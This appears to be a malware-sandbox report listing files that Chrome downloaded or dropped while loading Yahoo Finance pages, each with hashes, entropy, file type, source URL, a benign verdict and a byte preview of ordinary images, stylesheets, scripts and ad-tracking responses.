                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1CC426FF883092F36288B6F4E7DE9533
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7D65A389E20DF52C96BFA44A04B1038118AEAB11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A13BC5A50E8B81033E24E1C78EB9A9F58E3BB3FA6D6E79882DFF66EBF511780E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CDA9927FA89FA7CA0249F246C6FBE44C5D27E7BA6C954C32B376F93F9A9417FCB8913DBC0137AAB64DC374E0C8EB6565377B59533E428438E03456F62A363A62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C......................................................................................................................Z..........................!.1.AQ.."aq2....#BR...3b.$4r.....&5CSs......%DTct......(67E....................................6.......................!..1..."#A23Q.B.$4q..%a.CRr..............?..7V#..5......PL.`*.R..J.@.B...Dn6...gR..A J..Ak..F....-[x....t.LO.`...L..8....w.$.R........B."...i.l-...a..j.F..u|c..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.958264125899788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:CwtahV4qXnqSVG/tNZMy81QDdfh+HWigUBRdvd:ztaHjXnnQlNrVpJX5Avd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:283C3C476CBD067C8F90CB64A5DC2643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:87CDE61F6CD27CF00E4828136711D2A821D18481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3BB6D9A8ABAC4793E80AE31054BDF5CED45C76DA99461A16B8C4069D894B0B7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8835B1A44A29C147C9BB33BEF28C60700ED3BECA1F8483EBCA20A8AC90301DD1AC35EC43CB9FF3B5A42DD37FE3DD7FCEC578570A196EA9F7094865C2BB087085
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/f3GRHZeRABNpJiPbHs4McA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/wwd_409/a6afc674d9b56b0fa8f0f824d671500c.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF.;..WEBPVP8X.... .........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6VP8 .9.......*....>y4.I$..*.p.AP..c..u[p....[..x._.J..+....}/..................O.......z.z..'t.~.....~+...V.o....W.?.z...=E?5.....|..t.E...~...|................~@}?..../an.^..B..'#T4.|JT.....3.ccyP.a.&....]\..&=+....O..f.$..%.O.<'.=.8cR4.d.r...d.....E..N..d[..T.//.x.ZR.v.@NL.vgw...V.>.9..............xbH'....@'.&..$...20)2....F.8..P....[C...N..Lx.c.``.uG..r..."(m....&.........X.).7"...3\M.....P73.R.Hn..%qw....s..b....x.*#..gZ>...s...s.s.k..0vD...a..L.;...).X.0%...M.<0.MD.oi.%.y.1...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (569)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.836212689191219
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1AWS87Y4QfHLt9kNXaSM0uAiDMzA78yAvQAkgOwUVKKDA3BJn:bALjv0umzy8yjlgIVrAJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:710856DF28F09B1D9793CC137FAB0B44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5180769BC170A3ED76EC59D16C36589FC3ED97E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A27621E145DC70241E1B49989C7CDD1621D366189E5CC3CB0DD55DBB51476AF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:01A06ADD6D679E660B09D7D74E2C322E10413951CD093C40200F7A507D02300DC2609A87B4E1CA14A86FF40667DF7CE638D2EDD615459CB145745E45880264AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/ReportRating.7bfA62ik.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.source.yf-xfritq{display:flex;gap:var(--space-1);font-weight:var(--font-weight-normal);font-size:var(--font-m);color:var(--ui-gray-500)}@keyframes yf-xfritq-research-reports-loading{0%{background-position:100% 0}to{background-position:-100% 0}}.loading.yf-xfritq{animation-duration:3s;animation-fill-mode:forwards;animation-iteration-count:infinite;animation-name:yf-xfritq-research-reports-loading;animation-timing-function:linear;background:linear-gradient(to right,var(--surface4) 5%,var(--separator) 25%,var(--surface4) 40%);background-size:200%;position:relative}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.730841676486811
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:qqNHnQLiDuAJKyMhWqGYHYOfaK+Cw:qqRQLiDRKsvYH9aKLw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EBBF7585C063823A02D97415F292F30B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D2BD5E4B0CD41F20E1CBE337601D12439F7C9911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F6FF295E198F9014F50E977E199014089616A8C48F16F0E73532D60B5524C1C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FB0DB4BF4549D73F483EC92B77C7D49FEC2EE5C1E1FEDBF311FED145FB3164D493E604442AFD2AA69D35597F901D252A6F1BDC912CBE9B363869B8F60EE97AE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/CDS.DMTRQPpt.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var r=(o=>(o.footer="yfinance:editorialFooterTopics",o.stockStoryTopPics="yfinance:stockStoryTopTickers",o))(r||{});export{r as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1650
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.159978002033735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:tCbYLbGPGuXVGTTGzGeLGSoGQlnGMGl8YolNBa4xYZHnRDaHjjOtKwS7xDSyFYxT:Di+huqUGSbQMHmlNQulQKxM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:03C10F2C4E36A75805F7735D1F07C98C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DAEF61F97758BEF6CE593D34998F5F8EA7E20E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0F7D51EA19F78212DBF64706C7CCEB771E3D7B6390057BD4E44355B2850B1DA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:26C726B47435AAF67BA01633AA75F50E48718A494FF19C0E2BD9AD58D070508AE9C8A14255EA0BF5A754BFBA2F6C4BD4D20632A31464478DF74EE68F10C59465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/weather-svg/MOSTLY_SUNNY.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. <linearGradient x1="115.053%" y1="97.289%" x2="115.053%" y2="-17.557%" id="b">. <stop stop-color="#FFB92B" stop-opacity=".05" offset="0%"/>. <stop stop-color="#FF6900" offset="100%"/>. </linearGradient>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="c">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M20.464 26.12c-4.225-.75-8.257 2.1-9.051 6.396a5.422 5.422 0 00-5.252 2.062 5.67 5.67 0 00-.693 5.694 3.006 3.006 0 002.792 1.727h10.855c4.085.022 7.5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8199)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8221
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.770397076977929
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:0kICovkeR2Bo99EuuvZcLtfxvq2quHxihLquekxOtH/JRhaeua0VRqF:hDSQBo9Eu9tfRqoohskxOtfJKda0VRqF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF43C4FB0F766A7097922E6717DAD724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E6855B2CC470476FFF4020C5F55F71336CE1C500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:02351DC6492EB492CDC423BBDE1B6504A621EA652CC3137650C62F0DDF15A0FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2CB8C6D09373C565FBAB005262F952D64F2EE2F7B767876646416D98929B1663067B111A42C1D5F919DDF1BE059534F030ECA545ECF5EAC0C15E7C828BB30015
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:trc_json_response =.{"trc":{"si":"180b7abcdacfe26a5edf97d1d328e529","sd":"v2_180b7abcdacfe26a5edf97d1d328e529_27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380_1727716864_1727716866_CIi3jgYQm9teGIXczJ-kMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiOuMvY8NrPu1twAYABAA","ui":"27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380","plc":"DESK","wi":"-2162821594718986386","cc":"US","route":"US:CH:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1551771","cpb":"EhMyMDI0MDkyOS0xMi1SRUxFQVNFGM_V29MGIJz__________wEqGWNoLnRhYm9vbGFzeW5kaWNhdGlvbi5jb20yCHRyYzgwNDM3OID2uUFAkaQOSNWmD1DZiNcDWPUDYwj6NxDEShgyZGMI1xYQ1R8YI2RjCPIkELyDARgUZGMI-f__________ARD5__________8BGAdkYwjSAxDgBhgIZGMIlhQQmxwYGGRjCJ5oELSXARg9ZGMI_0YQjGYYHWRjCKQnEIM1GC9kYwj0FBCeHRgfZHgBgAHiI4gBy5mQ0gGQARiYAdLwzJ-kMtsBEAHcAQ","evh":"1478065135","evi":{"50":"7162|9540","61":"13342|19380","47":"5028|6787"},"vl":[{"ri":"16bc2106a1eb82723bf93caef4b47ef3","uip":"taboola-stream-2","ppb":"CKQH","v"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sync.srv.stackadapt.com/sync?nid=114&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.297626721392668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:C/2A3njBlJQ3inKohULTpT0en:C/nXjBlJ9nKoC3p7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C2A8B9C1DC0575001428A3E9FE5E35B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BC81F2DF8CF711262D2BD0E1150A048A7DCE89DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A5BE1395E97550A4878B7B5A93DAC798B8494D12146C6AE6CDA768D3FCB7F62A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:326DE2256957D8BFA8B4ADCBD11937865F295A331117C743985B04C5D9C7810C35F28B4CDD21D89937C5655E9F3FE30B9A75AC27DCBAAFC7A2416660496E1F59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.advBidxc.mnetRtusId({"status":"OK","userid":"1-EMoLINQEsYqGMU8kLRASVl8oV7OmZa"});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):22962
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.963786668553612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:a174GfIT5eiRDB6tWW/s7NRghfN7znRjL/0/3S/fJMKMAsWuojGBtvsMxT13kQ/U:a17nfgT68BGfZztfJZEWuoj+JPTtkCc/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:89C1B6EEB7A50635B8467404091E829E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D8145DABAC3940977A4E0B48F38AF0F9F430930C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:32BA1D3C36BF00F0CB58BF993B2370FF325911247222306E055981F0FD706AA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8A583803C9D2AE5737B7563902025405239F539AAF76BEF36818776C8328DCDAA0A5CDC58786FB6AA542FDAA05CDA9B5D57185A85F086CF304C84E74E320B1B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C.........................................................................d............................................G..........................!.1AQ."a..2q..#B..3R....$r..b.%CD.....s....................................*......................!..1.A.Q."#32BaRbq............?..X.../..zp..}p.........O+K.....#ee.....^..p...>..5....D3.#.B@.|.....A..c.....>.u........I).Q.)...=..P...Z..,(v......G..H.;..4.`...f.TEm....c...9.3..X.......Il!.2..mmN.?;.}...".....T.K.<...jV.P...o.5.L....*.Y......{..A.t\.py.nO-....D...y..*>7.?....:.B5.v...o...I.(.Ujjg...\..Ouj./..s.....A.....$.==./..A#.C..ry.^..FL.U.q.%E...61...WQ`F..do}........'..jLX>.....#q..e...s.y>.c..`Rj.......s8.d.Z,.! .i.R?z....s.+.0....[..x.T2...w+~...P<.,,...3}@.9..=e...t.R...C..'........4W.J...R..Q...J.b........A.c%@uV.S.C....@..#?J$.._...........CV.c.5.....y7C..@......c.?...<.R...V\..V*-...o...4sR...'..NvT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (33589), with LF, NEL line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):58753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.26167812703519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:y5B9KXqe7mdOgKY0hXpXVG8FoAKRXSdRKftld0VTScQI8rdFj8:EB9K6d8gghXnyXSuVld4z8Z6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A9C11221224C7869C6B916618D892612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:39C436EE6D2AFD6F851840AB4673C56CE0372D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7B48A74FA0F94D83AE6D60C772F5E7AA66E7BE1B63CCF223CA14E34D3D7B0D22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EA05BD1555D819AA35985D16EDA15F9A3805DA01F192156157739E30CE2A22D2888F8E4D1A2ED7A3FC2739CEF848B7EE882A5A628B3657E27AF979FE8F0EB09D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://hbx.media.net/pubcid.php?itype=HB&cb=window.advBidxc.mnetCoRtusId
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:try{ window.__mNPubCidCB = window.advBidxc.mnetCoRtusId ;/*. * This Source Code Form is subject to the terms of the Mozilla Public. * License, v. 2.0. If a copy of the MPL was not distributed with this file,. * You can obtain one at https://github.com/conversant/pubcid.js/blob/master/LICENSE. * Original github code https://github.com/conversant/pubcid.js. */.!function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (14567), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):14567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.233891295924048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:/lNH7DWdKQtK+ABPYUc3CGuucPoUq3xeQAazzlQ:vHXBPYU6CGNcPoI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FF6533FEBE2F4FB2E2DBAA32B38C5D20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8B293E36B0E1C49F68C3D7F93968A0101A372324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7CD57326970A4C3C96D26E9B5F95C3021E823A747DC0D55B89745075F3678FD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C8923B35A32E17F097602400992875496B49EBDDB9C8DDAC882D2EB835C190C1FB8DD1FF888BDDE1ADA67B3725CBDCE0A23C96A7DFA8799A2E0566A548B989C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-tabs",[],e):"object"==typeof exports?exports["wafer-tabs"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-tabs"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(i){if(a[i])return a[i].exports;var o=a[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,e),o.l=!0,o.exports}var a={};return e.m=t,e.c=a,e.d=function(t,a,i){e.o(t,a)||Object.defineProperty(t,a,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var a=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(a,"a",a),a},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,a){"use strict";function i(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.09068480531268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHPbzKgYjR4vP1cIW9NASAdSbFLwn:H69mc4sl3O4PXRYj815WfSGwn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:638F5EB9E45E22417AE30C2B59E7E053
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:76E6CA60A32604F8F741C07E0F8DA5793DBDAF1A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B13E514D5DFBA1694A7E77745BB32D59D8A8CB3E255DD79BB129EB9DABA93718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:614DE27C2D79E80D1483E23A2C39C50F6F4FE30A7FCE7AFFEF7F1ED4A2B8E84223859479FC956562FDF5100C76A2C179B821BA033524F9455AA6D508C24763F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
